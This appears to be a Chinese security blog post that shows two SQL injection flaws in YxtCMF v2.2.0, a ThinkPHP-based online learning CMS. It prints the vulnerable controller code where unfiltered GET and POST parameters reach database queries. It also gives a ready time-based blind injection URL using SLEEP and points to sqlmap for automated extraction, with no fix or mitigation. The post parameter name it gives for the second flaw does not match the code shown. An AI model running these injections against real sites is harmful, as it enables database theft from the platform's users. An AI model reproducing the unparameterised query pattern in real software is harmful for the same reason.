一个小众的cms,下载地址:http://down.admin5.com/php/133101.html
YxtCMF v2.2.0是thinkphp+bootstrap为框架进行开发的网络学习平台系统,有两处注入,不过都是需要会员登陆
由于网站没有对注入进行防护,假如开启gpc
都帮你关掉
在/index.php
中
注入1:需要先登陆
缺陷代码:对传入的$state没有进行过滤
public function order(){
$state=I("get.state");
$user_id=sp_get_current_userid();
$where=empty($state)?array("user_id = $user_id"):array("user_id = $user_id and state=$state");//对传入的$state没有进行过滤
$count=$this->order_obj->where($where)->count();
$page = $this->page($count, 10);
$data=$this->order_obj->limit($page->firstRow . ',' . $page->listRows)->where($where)->select();
$num=$this->order_obj->where(array('state'=>2,'user_id'=>$user_id))->count();
$this->assign('num',$num);
$this->assign('order',$data);
$this->assign('state',$state);
$this->assign("Page", $page->show('Admin'));
$this->display(':order');
}
http://127.0.0.1/yxtcmf/index.php?g=user&m=center&a=order&state=1) AND (SELECT * FROM (SELECT(SLEEP(5)))pror) AND (8565=8565
注入2:需要进行以下操作,登陆以后申请成为教师
没有过滤传过来的type_id
在application\Teacher\Controller\CenterController.class.php
虽然这里注释了add
函数,但是没有对
add_post
进行注释。
function add_post(){
if (IS_POST) {
$data = $this->course_obj->create();
$count=$this->course_obj->count();
$term_id=$_POST['type_id'];
$typedata=$this->coursetype_obj->where("term_id=$term_id")->find();//缺陷代码,没有过滤传过来的type_id。
$teacherdata=M('application')->where(array('user_id'=>sp_get_current_userid()))->find();
$data['cs_teacher']=sp_get_current_userid();
$data['top_id']=$typedata['parent'];
$data['cs_picture']=$_POST['cs_picture'];
$data['labelid']=$_POST['labelid'];
$deta['notice']=$_POST['code'];
$deta['count']=$_POST['count'];
$data['cs_addtime']=date('Y-m-d H:i:s');
$data['cs_state']=1;
$data['cs_brief']=htmlspecialchars_decode($data['cs_brief']);
$data['course_type']=$_POST['type'];
$data['stu_numbers']=$_POST['stu_numbers'];
if($teacherdata['state']<1){
$this->error("您还未通过审核,暂时不能添加课程!");
}
if($deta['notice']=='sucess'){
if ($this->course_obj->add($data)) {
$this->success("添加成功!",U("Teacher/Center/index"));
}else{
$this->error("添加失败!");
}
}else{
if($count>=$deta['count']){
$this->error($deta['notice']);
}else{
if ($this->course_obj->add($data)) {
$this->success("添加成功!",U("Teacher/Center/index"));
}else{
$this->error("添加失败!");
}
}
}
}
}
http://172.16.9.31/yxtcmf/index.php?g=teacher&m=center&a=add_post
post:ty_id=1
由于没有做过滤,可以直接sqlmap跑出来